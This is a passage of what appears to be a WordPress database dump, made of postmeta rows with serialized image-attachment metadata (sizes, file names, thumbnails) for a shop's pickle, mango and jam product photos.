e1646370369505-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:39:\"magaya-pckle-e1646370369505-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:37:\"magaya-pckle-e1646370369505-48x57.png\";s:5:\"width\";i:48;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:37:\"magaya-pckle-e1646370369505-48x57.png\";s:5:\"width\";i:48;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4562,1078,'_wp_attached_file','2022/03/omlet-pckle-e1646370715226.png'),(4563,1078,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:231;s:6:\"height\";i:212;s:4:\"file\";s:38:\"2022/03/omlet-pckle-e1646370715226.png\";s:8:\"filesize\";i:85555;s:5:\"sizes\";a:6:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:38:\"omlet-pckle-e1646370715226-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20460;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:36:\"omlet-pckle-e1646370715226-50x46.png\";s:5:\"width\";i:50;s:6:\"height\";i:46;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5571;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"omlet-pckle-e1646370715226-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"omlet-pckle-e1646370715226-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:36:\"omlet-pckle-e1646370715226-48x44.png\";s:5:\"width\";i:48;s:6:\"height\";i:44;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:36:\"omlet-pckle-e1646370715226-48x44.png\";s:5:\"width\";i:48;s:6:\"height\";i:44;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4564,1079,'_wp_attached_file','2022/03/rajapuri.jpg'),(4565,1079,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:335;s:4:\"file\";s:20:\"2022/03/rajapuri.jpg\";s:8:\"filesize\";i:20543;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:20:\"rajapuri-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11140;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"rajapuri-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2055;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"rajapuri-50x34.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:34;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:902;}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"rajapuri-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"rajapuri-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"rajapuri-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"rajapuri-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:18:\"rajapuri-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:18:\"rajapuri-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4566,1080,'_wp_attached_file','2022/03/ramkela-pickle-mngo.png'),(4567,1080,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:350;s:4:\"file\";s:31:\"2022/03/ramkela-pickle-mngo.png\";s:8:\"filesize\";i:227490;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:31:\"ramkela-pickle-mngo-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:169946;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:31:\"ramkela-pickle-mngo-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19927;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:29:\"ramkela-pickle-mngo-50x29.png\";s:5:\"width\";i:50;s:6:\"height\";i:29;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2357;}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"ramkela-pickle-mngo-300x175.png\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"ramkela-pickle-mngo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"ramkela-pickle-mngo-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"ramkela-pickle-mngo-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:29:\"ramkela-pickle-mngo-48x28.png\";s:5:\"width\";i:48;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:29:\"ramkela-pickle-mngo-48x28.png\";s:5:\"width\";i:48;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4568,1081,'_wp_attached_file','2022/03/ratnagiri-naturally-grown.jpg'),(4569,1081,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:4:\"file\";s:37:\"2022/03/ratnagiri-naturally-grown.jpg\";s:8:\"filesize\";i:52501;s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:37:\"ratnagiri-naturally-grown-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10826;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:37:\"ratnagiri-naturally-grown-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2145;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:35:\"ratnagiri-naturally-grown-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1025;}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"ratnagiri-naturally-grown-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"ratnagiri-naturally-grown-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"ratnagiri-naturally-grown-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"ratnagiri-naturally-grown-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:37:\"ratnagiri-naturally-grown-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"ratnagiri-naturally-grown-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"ratnagiri-naturally-grown-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:35:\"ratnagiri-naturally-grown-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:35:\"ratnagiri-naturally-grown-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:37:\"ratnagiri-naturally-grown-320x256.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4762,1077,'_wp_attachment_backup_sizes','a:13:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:4:\"file\";s:16:\"magaya-pckle.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:24:\"magaya-pckle-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:22:\"magaya-pckle-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:22:\"magaya-pckle-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}'),(4763,1090,'_wp_attached_file','2022/03/magaya-pckle-1-e1646370592915.png'),(4764,1090,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:558;s:6:\"height\";i:558;s:4:\"file\";s:41:\"2022/03/magaya-pckle-1-e1646370592915.png\";s:8:\"filesize\";i:579008;s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:41:\"magaya-pckle-1-e1646370592915-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:185266;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:41:\"magaya-pckle-1-e1646370592915-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20153;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:39:\"magaya-pckle-1-e1646370592915-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5640;}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"magaya-pckle-1-e1646370592915-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"magaya-pckle-1-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"magaya-pckle-1-e1646370592915-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:41:\"magaya-pckle-1-e1646370592915-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:41:\"magaya-pckle-1-e1646370592915-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:39:\"magaya-pckle-1-e1646370592915-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:39:\"magaya-pckle-1-e1646370592915-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4765,1090,'_wp_attachment_backup_sizes','a:13:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:4:\"file\";s:18:\"magaya-pckle-1.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:28:\"magaya-pckle-1-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:26:\"magaya-pckle-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:26:\"magaya-pckle-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:24:\"magaya-pckle-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}'),(4790,1078,'_wp_attachment_backup_sizes','a:6:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:231;s:6:\"height\";i:250;s:4:\"file\";s:15:\"omlet-pckle.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:23:\"omlet-pckle-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:23:\"omlet-pckle-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:23:\"omlet-pckle-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:21:\"omlet-pckle-48x52.png\";s:5:\"width\";i:48;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:21:\"omlet-pckle-48x52.png\";s:5:\"width\";i:48;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";}}'),(4887,1096,'_wp_attached_file','2022/03/raw-green-mango.jpg'),(4888,1096,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:400;s:6:\"height\";i:388;s:4:\"file\";s:27:\"2022/03/raw-green-mango.jpg\";s:8:\"filesize\";i:41530;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"raw-green-mango-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14181;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"raw-green-mango-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2950;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"raw-green-mango-50x49.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:49;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1268;}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"raw-green-mango-300x291.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:291;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"raw-green-mango-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"raw-green-mango-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"raw-green-mango-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:25:\"raw-green-mango-48x47.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:47;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:25:\"raw-green-mango-48x47.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:47;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4941,1099,'_wp_attached_file','2022/03/02.png'),(4942,1099,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:524;s:6:\"height\";i:398;s:4:\"file\";s:14:\"2022/03/02.png\";s:8:\"filesize\";i:466067;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:225988;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22992;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"02-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4597;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"02-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"02-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"02-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4989,1101,'_wp_attached_file','2022/03/Kissan-mango-jam.jpg'),(4990,1101,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:28:\"2022/03/Kissan-mango-jam.jpg\";s:8:\"filesize\";i:31801;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:28:\"Kissan-mango-jam-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12141;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:28:\"Kissan-mango-jam-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2183;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:26:\"Kissan-mango-jam-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\"